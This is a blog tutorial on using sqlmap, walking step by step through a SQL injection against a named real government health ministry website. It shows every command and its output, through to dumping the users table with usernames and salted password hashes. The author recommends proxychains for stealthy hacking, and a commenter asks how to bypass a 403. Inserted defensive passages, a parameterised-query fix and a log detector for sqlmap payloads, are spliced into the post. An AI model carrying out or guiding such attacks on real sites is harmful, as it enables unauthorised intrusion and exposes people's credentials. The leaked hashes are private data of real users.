How to Use Sqlmap
chanchan | 02.15 | Hacker
sqlmap is a tool for SQL injection penetration testing against a website. In my opinion it is the most complete free SQL injection tool available today. Havij exists too, but to me havij is less advanced; it is mostly used by newbies because it is so simple to use for a one-shot SQL injection attack.
I always use the flags --threads and --random-agent by default. Their functions:

--threads : the maximum number of concurrent HTTP connections sqlmap tries to open.
--random-agent : load a random User-Agent from sqlmap's default list,

```text
$ wc txt/user-agents.txt
2078 23092 198475 txt/user-agents.txt
```
```text
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump --dump-all
```
```text
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --banner

    sqlmap/1.0-dev (r4370) - automatic SQL injection and database takeover tool

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:09:14

[22:09:14] [INFO] fetched random HTTP User-Agent header from file '/root/sqlmap-dev/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5
[22:09:15] [INFO] using '/root/sqlmap-dev/output/www.depkes.go.id/session' as session file
[22:09:15] [INFO] testing connection to the target url
[22:09:15] [INFO] testing if the url is stable, wait a few seconds
[22:09:16] [INFO] url is stable
---8<------ snip
[22:11:31] [INFO] GET parameter 'folderid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[22:11:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[22:11:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[22:11:36] [INFO] testing 'Generic UNION query with Microsoft Access () comment (NULL) - 1 to 10 columns'
GET parameter 'folderid' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 445 HTTP(s) requests:
---
Place: GET
Parameter: folderid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: option=com_depkesdownload&itemid=21&folderid=51' AND 8184=8184 AND 'TEzv'='TEzv

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: option=com_depkesdownload&itemid=21&folderid=51' AND SLEEP(5) AND 'ISyk'='ISyk
---

[22:14:12] [INFO] the back-end DBMS is MySQL
[22:14:12] [INFO] fetching banner
[22:14:12] [INFO] retrieving the length of query output
[22:14:12] [INFO] retrieved: 6
[22:14:21] [INFO] retrieved: 5.0.45
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
banner: '5.0.45'

[22:14:21] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 198 times
[22:14:21] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'

[*] shutting down at 22:14:21
```
At the start of an injection with sqlmap it is advisable to fetch the banner first; with this trial-and-error style of injection sqlmap finds it easier to build a road map of the injection type for the website's DBMS. Just to share: I once skipped the banner and went straight for --dbs, and it failed; when I tried again another time with --banner, sqlmap managed to inject that site, and voila, from there on sqlmap fetched data easily.
From the MySQL banner-fetch injection we got a positive result from the target, namely the DBMS version: MySQL 5.0.11, with injection type MySQL Blind.
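Both injection points above hang off the same defect: the folderid value is spliced into the SQL text, so a quote in it ends the string literal and the rest runs as SQL. The following added example (my own code, not from the post, from sqlmap, or from the site tested) reproduces that defect against a constructed SQLite table, runs the post's boolean-based payload through it, and shows that the parameterised form of the same query no longer gives a TRUE/FALSE oracle. The table, its rows and the function names are assumptions.

```python
"""Why the 'folderid' payloads sqlmap reported work, and what stops them.

Added example; this is not code from the original post, from sqlmap, or from
the site under test. A constructed in-memory SQLite table stands in for the
download component's folder table, and the two query functions are assumed
shapes of application code, not the real ones.
"""
import sqlite3

# Constructed sample data: three download folders, one of them unpublished.
SAMPLE_FOLDERS = [
    (51, "Annual reports", 1),
    (52, "Internal drafts", 0),
    (53, "Press releases", 1),
]

# Boolean-based blind payloads for folderid. PAYLOAD_TRUE is the one sqlmap
# printed in the post; PAYLOAD_FALSE is the same string with the comparison
# made false, which is how sqlmap tells a TRUE page from a FALSE page.
PAYLOAD_TRUE = "51' AND 8184=8184 AND 'TEzv'='TEzv"
PAYLOAD_FALSE = "51' AND 8184=8185 AND 'TEzv'='TEzv"


def make_db():
    """Build the throwaway database the example queries run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE folders (id INTEGER, name TEXT, published INTEGER)")
    conn.executemany("INSERT INTO folders VALUES (?, ?, ?)", SAMPLE_FOLDERS)
    return conn


def folder_names_vulnerable(conn, folderid):
    """The defect sqlmap exploits: the request parameter is pasted into the SQL
    text, so a quote inside it closes the literal and the rest is run as SQL."""
    sql = "SELECT name FROM folders WHERE id = '%s' AND published = 1" % folderid
    return [row[0] for row in conn.execute(sql)]


def folder_names_parameterised(conn, folderid):
    """Hardened form: the value is bound as a parameter and is only ever data.
    The whole payload is compared against the integer id and matches nothing."""
    sql = "SELECT name FROM folders WHERE id = ? AND published = 1"
    return [row[0] for row in conn.execute(sql, (folderid,))]


def boolean_oracle_present(query_fn, conn):
    """True when the TRUE and FALSE payloads produce different responses, i.e.
    when the database can be read one bit per request, which is what sqlmap's
    'boolean-based blind' technique relies on."""
    return query_fn(conn, PAYLOAD_TRUE) != query_fn(conn, PAYLOAD_FALSE)


if __name__ == "__main__":
    db = make_db()
    for fn in (folder_names_vulnerable, folder_names_parameterised):
        print(fn.__name__, "oracle present:", boolean_oracle_present(fn, db))
```

The time-based payload is not exercised here only because SQLite has no SLEEP(); it depends on exactly the same string splicing, and the same bound parameter removes it. Binding is the fix at the code level; the run above also shows why the DBMS account matters, since a blind oracle reads whatever that account can SELECT.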
2. Fetch the user in use and the database in use with the flags (--current-user and --current-db)
The second step is to analyse which user the DBMS is running as and which database the website is currently using.
```text
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --current-user --current-db

--------8<--- snip

[22:24:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
[22:24:23] [INFO] fetching current user
[22:24:23] [INFO] retrieving the length of query output
[22:24:23] [INFO] read from file '/root/sqlmap-dev/output/www.depkes.go.id/session': 20
[22:24:46] [INFO] retrieved: website-in@localhost
current user: 'website-in@localhost'

[22:24:46] [INFO] fetching current database
[22:24:46] [INFO] retrieving the length of query output
[22:24:46] [INFO] retrieved: 6
[22:24:55] [INFO] retrieved: portal
current database: 'portal'

[22:24:55] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'

[*] shutting down at 22:24:55
```
Next we fetch the list of databases; knowing which other databases exist, we are free to inject into any database that is available for injection.
```text
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --dbs

--------8<--- snip

[22:36:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
[22:36:06] [INFO] fetching database names
[22:36:06] [INFO] fetching number of databases
[22:36:06] [INFO] retrieved: 2
[22:36:08] [INFO] retrieving the length of query output
[22:36:08] [INFO] retrieved: 18
[22:36:31] [INFO] retrieved: information_schema
[22:36:31] [INFO] retrieving the length of query output
[22:36:31] [INFO] retrieved: 6
[22:36:40] [INFO] retrieved: portal
available databases [2]:
[*] information_schema
[*] portal

[22:36:40] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'

[*] shutting down at 22:36:40
```
4. Fetch the list of tables in the portal database with the flags (-D portal --tables)

```text
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal --tables
```

Here is the list of tables retrieved by injection from the portal database; there are 89 tables.
```text
root@ubuntu:~/sqlmap-dev/output/www.depkes.go.id# cat log

-----8<---- snip ---

Database: portal
[89 tables]
+------------------------------+
| jos_assignments |
| jos_banner |
| jos_bannerclient |
| jos_bannertrack |
| jos_categories |
| jos_components |
| jos_contact_details |
| jos_content |
| jos_content_frontpage |
| jos_content_rating |
| jos_core_acl_aro |
| jos_core_acl_aro_groups |
| jos_core_acl_aro_map |
| jos_core_acl_aro_sections |
| jos_core_acl_groups_aro_map |
| jos_core_log_items |
| jos_core_log_searches |
| jos_downloads |
| jos_downloads_blob |
| jos_downloads_category |
| jos_downloads_classify |
| jos_downloads_containers |
| jos_downloads_file_classify |
| jos_downloads_files |
| jos_downloads_folders |
| jos_downloads_log |
| jos_downloads_repository |
| jos_downloads_reviews |
| jos_downloads_structure |
| jos_downloads_text |
| jos_groups |
| jos_hwdvidsantileech |
| jos_hwdvidscategories |
| jos_hwdvidsfavorites |
| jos_hwdvidsflagged_groups |
| jos_hwdvidsflagged_videos |
| jos_hwdvidsgroup_membership |
| jos_hwdvidsgroup_videos |
| jos_hwdvidsgroups |
| jos_hwdvidsgs |
| jos_hwdvidslogs_archive |
| jos_hwdvidslogs_favours |
| jos_hwdvidslogs_views |
| jos_hwdvidslogs_votes |
| jos_hwdvidsplugin |
| jos_hwdvidsrating |
| jos_hwdvidsss |
| jos_hwdvidsvideos |
| jos_jdownloads_cats |
| jos_jdownloads_config |
| jos_jdownloads_files |
| jos_jdownloads_license |
| jos_jdownloads_templates |
| jos_menu |
| jos_menu_types |
| jos_messages |
| jos_messages_cfg |
| jos_migration_backlinks |
| jos_mod_apotik |
| jos_mod_puskesmas |
| jos_mod_puskesmas15072011 |
| jos_mod_puskesmas24112010 |
| jos_mod_puskesmas_23012011 |
| jos_mod_puskesmas_old |
| jos_mod_rumah_sakit |
| jos_modules |
| jos_modules_menu |
| jos_newsfeeds |
| jos_permissions |
| jos_phocadownload |
| jos_phocadownload_categories |
| jos_phocadownload_licenses |
| jos_phocadownload_sections |
| jos_phocadownload_settings |
| jos_phocadownload_user_stat |
| jos_plugins |
| jos_poll_data |
| jos_poll_date |
| jos_poll_menu |
| jos_polls |
| jos_rokdownloads |
| jos_rokversions |
| jos_sections |
| jos_session |
| jos_stats_agents |
| jos_swmenufree_config |
| jos_templates_menu |
| jos_users |
| jos_weblinks |
+------------------------------+
```
After that we come to the final step of any web injection: fetching the contents of the tables. Since the interesting table in the list above is the users table, we fetch its contents right away.
First we fetch the list of columns in that table, and then fetch data only from the columns that matter. We fetch the columns with the flags (-D portal -T jos_users --columns)
```text
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal -T jos_users --columns

----8<----snip

+---------------+---------------------+
| Column | Type |
+---------------+---------------------+
| activation | varchar(100) |
| block | tinyint(4) |
| email | varchar(100) |
| gid | tinyint(3) unsigned |
| id | int(11) |
| lastvisitDate | datetime |
| name | varchar(255) |
| params | text |
| password | varchar(100) |
| registerDate | datetime |
| sendEmail | tinyint(4) |
| username | varchar(150) |
| usertype | varchar(25) |
+---------------+---------------------+

[02:39:42] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'

[*] shutting down at 02:39:42
```
```text
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal -T jos_users -C username,password --dump
```

```text
root@ubuntu:~/sqlmap-dev# cat output/www.depkes.go.id/log

----------8<----snip

Database: portal
Table: jos_users
[11 entries]
+-------------------------------------------------------------------+---------------+
| password | username |
+-------------------------------------------------------------------+---------------+
| 35d1b3c70e13825c0d4a67843adbf6ef:sQEMDKp8NKGSLMMKP5DocOSMwO1uCV3l | admin |
| f45161dd4038a5946c1dbcc59dbc0d6a:JUYQ0bIg2mt0XrIotHzVRw4yTowVCgIi | andri |
| 06b60c7bbdd5e197810d9018c3640ccd:MXghhJp9fJc8uadkcrZC30dZhyn3JnK7 | dewi_roro |
| 1e41bc000f1461a1410823fcdd7f0c22:eNKOmRJO35Mxa5PqI8jJAxAR7mN4qPxO | ipunk |
| 30f9ade9382291ffaf41ba0e35fa54ca:EOnhJGXlt5LLl0cefNLleOYQ8OCCgloc | ismail |
| d8c27e4de63a2c48e4a66ec8d88160c8:I30jspHGk6lPca18gwX1k069vqopqnoc | isti |
| faf5fc5f3d5901d79a396c62cacdc639:dRzIfNbjgAkj5Bco281VE1y6PiaKQLLa | Miemie Widya |
| 42fac0d700127746caac2c225b1f0427:pGFxjurnXno3dLMZMxwhdGe65NsI0zDl | puskom |
| d7c49e113aca936ed03c452c71784e7b:7mABDrLJBxFSbLyiDTcCi2Xr5agcxeGc | rsud meureudu |
| 27a94db23c3d203edbcd7314a998bf9e:R3x0ypx8lbe7yrAylDbixbf0pDdZ2KDb | silver |
| 50a09da3b0d90b736e939862ef565c4d:YGJbFZxWVEayGlylKuyLvmY5wadgQy5K | supriyono |
+-------------------------------------------------------------------+---------------+
```
To do a full dump of all columns you can use the flags (-D portal -T jos_users --columns --dump), but the output is messy because of the number of columns, so it is better to fetch only the columns we consider necessary. Here is the result of the full dump for the jos_users table: jos_users.txt
The best thing about tool-based SQL injection is combining it with proxychains, which gives you a website hacking tool that is stealthy, powerful, yet simple.
Enjoy..
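Proxychains only hides the source address; everything else in the run above stays in the target's web server logs: the quote-then-AND and SLEEP() payloads, a different User-Agent on every request, a burst of requests to one parameter and, in this case, 198 responses of 404. The following added example (my own, not from the post or from sqlmap) runs a small detector over constructed Apache combined-log lines modelled on that run. The addresses, timestamps, sizes and the log lines themselves are made up; the payload strings are the ones sqlmap printed above.

```python
"""Detecting an sqlmap run from web server access logs.

Added example, not code from the original post or from sqlmap. The log lines
below are constructed to resemble what the run in the post would leave behind;
the source addresses, timestamps and sizes are invented.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines. sqlmap URL-encodes its payloads, so
# the detector decodes the request path before matching.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jul/2011:22:09:15 +0700] "GET /index.php?option=com_depkesdownload&itemid=21&folderid=51 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5"
203.0.113.7 - - [15/Jul/2011:22:09:16 +0700] "GET /index.php?option=com_depkesdownload&itemid=21&folderid=51%27%20AND%208184%3D8184%20AND%20%27TEzv%27%3D%27TEzv HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.7 - - [15/Jul/2011:22:09:16 +0700] "GET /index.php?option=com_depkesdownload&itemid=21&folderid=51%27%20AND%20SLEEP%285%29%20AND%20%27ISyk%27%3D%27ISyk HTTP/1.1" 200 5120 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00"
203.0.113.7 - - [15/Jul/2011:22:09:17 +0700] "GET /index.php?option=com_depkesdownload&itemid=21&folderid=51%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8) AppleWebKit/531.9"
198.51.100.4 - - [15/Jul/2011:22:09:18 +0700] "GET /index.php?option=com_depkesdownload&itemid=21&folderid=52 HTTP/1.1" 200 4890 "-" "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Signatures taken from the techniques sqlmap reported or tested in the post.
PAYLOAD_PATTERNS = [
    ("quote-then-AND tautology", re.compile(r"'\s*AND\s+\d+\s*=\s*\d+", re.I)),
    ("time-based SLEEP()", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("UNION column probe", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def classify_request(url):
    """Return the names of the payload signatures found in a decoded request URL."""
    decoded = unquote_plus(url)
    return [name for name, rx in PAYLOAD_PATTERNS if rx.search(decoded)]


def summarise(records):
    """Per-source counters that together fingerprint an automated injection run."""
    per_ip = defaultdict(lambda: {"requests": 0, "payload_hits": 0,
                                  "agents": set(), "not_found": 0, "findings": set()})
    for rec in records:
        s = per_ip[rec["ip"]]
        s["requests"] += 1
        s["agents"].add(rec["ua"])          # --random-agent shows up as churn here
        if rec["status"] == "404":
            s["not_found"] += 1             # the post's run produced 198 of these
        hits = classify_request(rec["url"])
        if hits:
            s["payload_hits"] += 1
            s["findings"].update(hits)
    return {ip: {"requests": s["requests"], "payload_hits": s["payload_hits"],
                 "distinct_agents": len(s["agents"]), "not_found": s["not_found"],
                 "findings": sorted(s["findings"])}
            for ip, s in per_ip.items()}


def flag_sources(summary):
    """Flag a source that sent any injection payload, or that changed its
    User-Agent on every one of several requests. A NAT gateway can also look
    like the second case, so that rule is a lead for review, not proof."""
    flagged = []
    for ip, s in summary.items():
        rotating = s["requests"] >= 3 and s["distinct_agents"] == s["requests"]
        if s["payload_hits"] >= 1 or rotating:
            flagged.append(ip)
    return sorted(flagged)


if __name__ == "__main__":
    report = summarise(parse_log(SAMPLE_LOG))
    for ip in flag_sources(report):
        print(ip, report[ip])
```

The payload signatures are deliberately narrow (the three techniques visible in the run above) so the detector is easy to reason about; in production the per-source counters, especially request volume against one parameter and User-Agent churn, catch variations of the payload text that a regex list misses.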
1 comment:

Cool
Bro, what if it comes back access forbidden 403.. how do you bypass that, bro..
Please advise